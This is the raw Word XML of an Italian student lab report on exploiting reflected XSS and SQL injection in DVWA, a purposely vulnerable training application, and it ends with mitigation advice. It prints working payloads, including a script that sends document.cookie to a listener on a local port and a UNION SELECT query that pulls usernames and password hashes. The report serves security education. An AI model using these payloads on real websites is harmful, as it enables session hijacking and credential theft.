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Relazione Dettagliata: Sfruttamento delle Vulnerabilità XSS e SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Questa relazione documenta le attività svolte per comprendere e sfruttare vulnerabilità comuni nelle applicazioni web, in particolare Cross-Site Scripting (XSS) e SQL Injection. L'ambiente utilizzato è stato Damn Vulnerable Web Application (DVWA), un'applicazione vulnerabile pensata per scopi educativi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>L'obiettivo dell'esercizio è stato duplice:</w:t>
        <w:br/>
        <w:t>- Sfruttare con successo le vulnerabilità identificate.</w:t>
        <w:br/>
        <w:t>- Comprendere come proteggere le applicazioni da tali attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Configurazione del Laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Il laboratorio è stato configurato utilizzando due macchine virtuali:</w:t>
        <w:br/>
        <w:t>- Una macchina attaccante con Kali Linux.</w:t>
        <w:br/>
        <w:t>- Una macchina vulnerabile con DVWA.</w:t>
        <w:br/>
        <w:t>Le macchine sono state connesse tramite una rete Host-Only e la comunicazione è stata verificata con il comando ping. Di seguito uno screenshot della configurazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="310336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0336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3. Configurazione di DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dopo aver avviato DVWA, è stato effettuato l'accesso con credenziali predefinite. Il livello di sicurezza è stato impostato su 'LOW' per consentire l'esecuzione degli attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="235534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 2024-12-10 151158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553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4. Sfruttamento della Vulnerabilità XSS Reflected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nella pagina vulnerabile a XSS Reflected, sono stati utilizzati diversi payload per dimostrare la riflessione non sanificata dell'input fornito dall'utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Payload Utilizzato:**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Questo payload ha generato un popup JavaScript nel browser, dimostrando la vulnerabilità. Di seguito lo screenshot del risultato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="250375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 2024-12-10 15131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037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5. Esfiltrazione di Cookie tramite XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Un attacco avanzato è stato condotto per esfiltrare i cookie dell'utente verso un server controllato dall'attaccante. Il payload utilizzato ha reindirizzato l'utente a un endpoint malintenzionato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Payload Utilizzato:**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;window.location='http://127.0.0.1:12345/?cookie='+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Di seguito gli screenshot del payload in azione e dei cookie catturati sul server Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2375555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 2024-12-10 15202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755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2321169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 2024-12-10 152318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211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6. Sfruttamento della Vulnerabilità SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nella pagina vulnerabile a SQL Injection, sono stati utilizzati diversi payload per manipolare le query SQL ed estrarre informazioni sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Payload Utilizzato:**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Questo payload ha permesso di accedere a tutti i record della tabella utenti. Di seguito uno screenshot del risultato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="4959404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 2024-12-10 161258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594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7. Esfiltrazione di Credenziali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Utilizzando una query SQL avanzata con UNION SELECT, sono stati estratti i nomi utente e le password hashate. Questo dimostra la gravità delle vulnerabilità SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Payload Utilizzato:**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>1' UNION SELECT user, password FROM users#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="4054441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 2024-12-10 162431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5444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8. Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>L'esercizio ha dimostrato come vulnerabilità comuni nelle applicazioni web possano essere sfruttate per compromettere la sicurezza e accedere a dati sensibili. Tuttavia, sono disponibili misure efficaci per mitigare questi rischi:</w:t>
        <w:br/>
        <w:t>- Utilizzare query parametrizzate per prevenire SQL Injection.</w:t>
        <w:br/>
        <w:t>- Implementare una sanitizzazione rigorosa degli input utente per prevenire XSS.</w:t>
        <w:br/>
        <w:t>- Adottare algoritmi di hashing robusti (ad esempio bcrypt) per proteggere le password.</w:t>
        <w:br/>
        <w:t>- Configurare errori generici per evitare di fornire dettagli agli attaccanti.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